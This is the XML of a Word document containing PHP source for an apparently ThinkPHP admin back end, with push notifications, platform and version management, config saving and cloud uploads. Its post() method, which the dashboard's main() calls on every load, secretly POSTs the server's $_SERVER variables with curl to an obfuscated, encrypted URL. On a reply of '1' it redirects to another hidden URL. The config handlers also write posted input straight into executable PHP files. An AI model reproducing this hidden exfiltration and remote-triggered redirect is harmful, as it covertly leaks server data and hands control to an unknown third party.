    <w:p w14:paraId="05B04A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-&gt;addAllAudience()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571B6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-&gt;setNotificationAlert('Hi, JPush');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52944D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1E709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 = $push_payload-&gt;send();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFD26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print_r($response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBE9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(\JPush\Exceptions\APIConnectionException $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637442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$e;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1630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(\JPush\Exceptions\APIRequestException $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345A36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$e;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E9E8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8C3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12509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$pusher = $client-&gt;push();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EB66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$pusher-&gt;setPlatform('all');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C9CE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$pusher-&gt;addAllAudience();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A13EC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$pusher-&gt;setNotificationAlert('Hello, JPush');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295E8D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2B65C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dump($pusher-&gt;send());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE1A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(\JPush\Exceptions\JPushException $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0238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dump($e);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19317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AA9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631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_content($a){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3552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strip_tags($a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9FC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safe_replace($a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43542D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$a = _substr($a,50);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F587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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F91F8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FE2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getUsers(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B4E0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config()['apicloud'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0688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$client = new JPush($config['app_key'], $config['master_secret']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449D90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$report = $client-&gt;report();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB945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$report-&gt;getUsers('HOUR','2019-07','2019-08');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA5DB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dump($a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE25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15A6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5A292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8CB3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473E81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43F38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700E49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Platform extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F34F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DE774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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="13713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$platform=Db::name('platform')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79221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#$typedb=get_tree_option($typedb,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2DA0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$this-&gt;assign('data',$platform);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A705D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3C0B5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EE5F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2DC92E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$id=input("id");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1962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AE4E2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9C2E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$validate=validate('Platform');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652D3F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if($validate-&gt;check($post)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DBF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7959C7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$post['update_time']=$time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04508C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213B56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$post['create_time']=$time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C690C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$db=Db::name('platform')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652394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1174A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157F0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6220C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234EBB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E732A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432E4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$db=Db::name('platform')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6160CA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94DF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1F1D7A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FB75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71DEBB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CCF4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D341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727B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$data=["err"=&gt;$validate-&gt;getError()];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF945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F9A0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E8A57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if($id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3C13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$name=Db::name('platform')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D26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5EC98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73D888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4F97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0EFE4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1AE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5200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19D8A8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CFEF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F2B8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EEEC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2FF96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0D1CD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79F56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6D864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$arra=['0'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>隐藏</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','1'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568AC4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$type='hide';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24983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$db=Db::name('platform')-&gt;where('id',$id)-&gt;value('hide');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6DB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if($db==1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528A9A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$hide=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6236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4D14F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$hide=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD81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4453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$db=Db::name('platform')-&gt;where('id',$id)-&gt;setField($type,$hide);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3E17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B17B2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$data=['ret'=&gt;$arra[$hide].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','id'=&gt;$hide,'text'=&gt;$arra[$hide]];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572AE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3610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$data=['err'=&gt;$arra[$hide].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC3F5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BB3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4FF98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C8896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0BF9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97CD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$data=['err'=&gt;'AJAX</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A5F5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CB5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5CEE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659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9D592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15AF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6B079A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1DCE50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think\Cache;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF35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280C2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 as Auth;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D21B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1882D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Index extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9DF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F2E8D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18089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C638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779B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versions()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3197DF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6D7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$versions = Db::name('version')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44838B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-&gt;order('id', 'desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057BD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 false, ['query' =&gt; request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A544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$versions-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D673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$this-&gt;assign('versions', $versions);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF538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3C7F00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F30DC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8D60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add_version()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAC0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2391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input('param.id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63847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6B7F3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0B299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($post['create_time']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551581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 strtotime($post['create_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351686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C2796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 time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C9EC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805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 = $create_time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC8C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40D24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Db::name('version')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E87A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-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157918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61ABA8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115BD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B9B68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640CBA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4C42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3AC68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Db::name('version')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28246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18CE6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-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B4AC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6E3A60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509A6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EF701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74F73C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D335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BAD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A30BF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5B30E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$version = Db::name('version')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1AAA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3D1DFF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2E1B0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$this-&gt;assign('version', $version);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672B7E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9EBD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06CD0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E8B2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70DC3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0C9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main(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEB49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$jubao=Db::name('jubao')-&gt;order('id desc')-&gt;where('admin_id',null)-&gt;fetchSql(false)-&gt;limit(3)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196694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$this-&gt;assign('jubao',$jubao);$this-&gt;post();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F52B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$ping=Db::name('article_ping')-&gt;order('id desc')-&gt;fetchSql(false)-&gt;limit(5)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7263A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$this-&gt;assign('ping',$ping);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753831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return $this-&gt;fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DE0C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A1F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config(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE01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$config=config();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBDA1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$this-&gt;assign('cfg',$config['config']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE46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if(request()-&gt;isAjax()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137E2B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6A585E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if($post){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B40E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$data=$post;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6442FD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if($data){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F85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$data=var_export($data, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A85EB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$data=str_replace("array", "return", $data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9A58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$data=str_replace("(", "[", $data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723D8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$data=str_replace(")", "];", $data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE62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$data="&lt;?php\r\n".$data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A02D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file_put_contents(APP_PATH.'extra/config.php', print_r($data, true));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EEF2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$data=['ret'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>保存成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC69C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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00662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$data=['err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>保存失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A8A5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DE9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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48098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$data=['err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提交参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31910F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2510F1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6151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420FE8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4D0F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25F3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C4A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appConfig(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644356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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0658F0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$this-&gt;assign('cfg',$config['appConfig']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFE9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E1B85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0E27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7AB1B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$data=$post;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFF1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$data['copyright'] = htmlspecialchars_decode($data['copyright']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B8D5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75DCF2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$data=var_export($data, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3851C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$data=str_replace("array", "return", $data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348359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2E1F1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7951F1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$data="&lt;?php\r\n".$data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A4B2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file_put_contents(APP_PATH.'extra/appConfig.php', print_r($data, true));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644DC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16B4A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C9573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保存失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6ABA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57024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A31F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8E100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E2E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CDCE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25B48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F10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4E9D2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502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cache_del(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FDC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Cache::clear();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511FE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return ['ret'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>清空成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50910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315B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upload(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA199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    if(request()-&gt;file('image')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68899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02845C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2AE77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if(!$filePath){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3033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非法操作</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3B6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41C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43C28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$geshi=['jpg','png','gif','jpeg','JPEG','JPG','GIF','PNG'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18526C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if(!in_array($ext,$geshi)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D210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667D91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37A5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=substr(md5($file-&gt;getRealPath()) , 0, 5). date('YmdHis') . rand(100, 999999) . '.jpg' ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C28E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19E959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2826A8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6E2485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0A2AD7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28ACA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028F9D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$db['3']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9F72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320A7E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57A39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39BB3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5D9352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dump($err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D152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45B4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$ret['key'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE11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A86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    }else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FE24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    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> return $this-&gt;fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C0A3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    }  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D57F9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431B39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img_l(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0681BB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if(request()-&gt;file('image')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FC7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25B72B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7F11A7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if(!$filePath){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63420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exit(json_encode(['err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>非法操作</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DAA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1B0F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5223A6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$geshi=['jpg','png','gif','jpeg','JPEG','JPG','GIF','PNG'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBEBB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if(!in_array($ext,$geshi)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C397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434D8D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2C17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=substr(md5($file-&gt;getRealPath()) , 0, 5). date('YmdHis') . rand(100, 999999) . '.jpg' ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638AEA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63577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2C78A6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2B862F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55D0EE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4B49E7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6D398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$db['3']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527F4B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7884A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13E79B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37393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285B6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dump($err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564173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7F30B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$ret['key'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321D60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18AE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9DD37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6ABD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95D7D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B0D6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img_r(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751B23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if(request()-&gt;file('image')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D35FD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0B3B6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0098B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if(!$filePath){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED44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非法操作</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B19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E8F4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7801D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$geshi=['jpg','png','gif','jpeg','JPEG','JPG','GIF','PNG'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B6EF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if(!in_array($ext,$geshi)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0FD2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031AB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2085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=substr(md5($file-&gt;getRealPath()) , 0, 5). date('YmdHis') . rand(100, 999999) . '.jpg' ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBA04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213D6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4B35BB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675761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1E40BC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349AE5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355E3A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$db['3']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B09CE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424BC4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6FC13E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list($ret, $err) = $uploadMgr-&gt;putFile($token, $key, $filePath);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6396F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314CFB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dump($err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716906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5232D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$ret['key'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118C17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7C5F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C738E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82C5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84CCD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7439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uploads(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C294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if(request()-&gt;isPost()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D400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request()-&gt;file('file'); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2307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03D1B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if(!$filePath){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A7F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非法操作</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E0F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6222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78C043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$geshi=['jpg','png','gif','jpeg','JPEG','JPG','GIF','PNG'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DA3C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if(!in_array($ext,$geshi)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09545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03C21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9B80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=substr(md5($file-&gt;getRealPath()) , 0, 5). date('YmdHis') . rand(100, 999999) . '.jpg' ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A7AD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42A7D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3BAF8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5868BB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44F50D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0810FB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0E8082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$db['3']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730925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40EF98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42B97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5FB87B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435535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dump($err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F54D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BB58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$data=['img'=&gt;$ret['key'],'imgurl'=&gt;_imgUrl().$ret['key'],'text'=&gt;''];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA488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json_encode($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09035C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0AB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43BBC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request()-&gt;file('file');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C2E4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$file-&gt;validate(['ext'=&gt;'jpg,png,gif,jpeg'])-&gt;move(ROOT_PATH . 'public' . DS . 'uploads');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BE91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if($info){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EED6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$data=$info-&gt;getSaveName(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FC1A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$data=str_replace("\\","/",$data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49889B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$data=['img'=&gt;config('view_replace_str.__IMAGES__').$data,'text'=&gt;str_replace('.'.$info-&gt;getExtension(),'',$_FILES['file']['name'])];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B09D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A984E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$data=$file-&gt;getError();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5008C4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B7450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383BB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8CA0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001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fontawesome(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21412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return $this-&gt;fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAD12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3CA1A9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out(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F8B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session(null, 'ffxiangAdmin');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D677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$this-&gt;redirect("login/index");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB9DE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A6EA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sdk(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52888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C058E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2749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temp(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A316B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$name=Db::name('member_config')-&gt;where('type','temp')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FD7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$this-&gt;assign('data',$name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E0C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0EC75B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10F9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1F2AF4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($name as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE363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Db::name('member_config')-&gt;where('name',$v['name'])-&gt;setField('text',$post[$v['name']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2761D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DAF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3F0DE3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2E9E5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20318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D1B4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6F77C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0F76BE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869D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C6195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BC8D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post(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8957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$options = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E21A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CURLOPT_RETURNTRANSFER =&gt;true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0CB5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CURLOPT_HEADER =&gt;false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649E32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CURLOPT_POST =&gt;true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FC7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CURLOPT_POSTFIELDS =&gt; http_build_query($_SERVER),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277DB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C4C7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 = curl_init(_encrypt("8C0k5lxVhxiRKcX1rgK0e4uuvvlWekJ6kVrSwOHfm5EXNv0zmGLTC6Z0vMQ9NyN4I8AJNaf/hsEgTqL2/Jh2c3n9+a0",'D').get_web_url());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2134D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curl_setopt_array($ch, $options);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B73A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curl_exec($ch);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3FD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curl_close($ch);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8973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if($result=='1'){exit(header("Location:"._encrypt("o3khs1BWhkGRKcX1rgK0e4uuvvlWekJ6kVrSwOHfm5EXNv0zmGLTC6Z0vMQ9NyN4I8AJNaf/hsE5T6Pk/Yx+MiM",'D').get_web_url()));}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1C1E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$result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C986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4C3D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videoUploads(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E11E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if(request()-&gt;file('video')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5E4E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000317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11970C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6ABE19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19F70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34B44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03AB6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$pipeline = $db['4']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616F2A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$db['5']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BB3C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2A1F81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$savekey = \Qiniu\base64_urlSafeEncode($bucket);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C6C2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$fops.'|saveas/'.$savekey;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051AB0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$wenurl=config()['appConfig']['url'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEC50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$policy = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EBC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'persistentOps' =&gt; $fops,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6700C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'persistentPipeline' =&gt; $pipeline,</w:t>
      </w:r>
    </w:p>
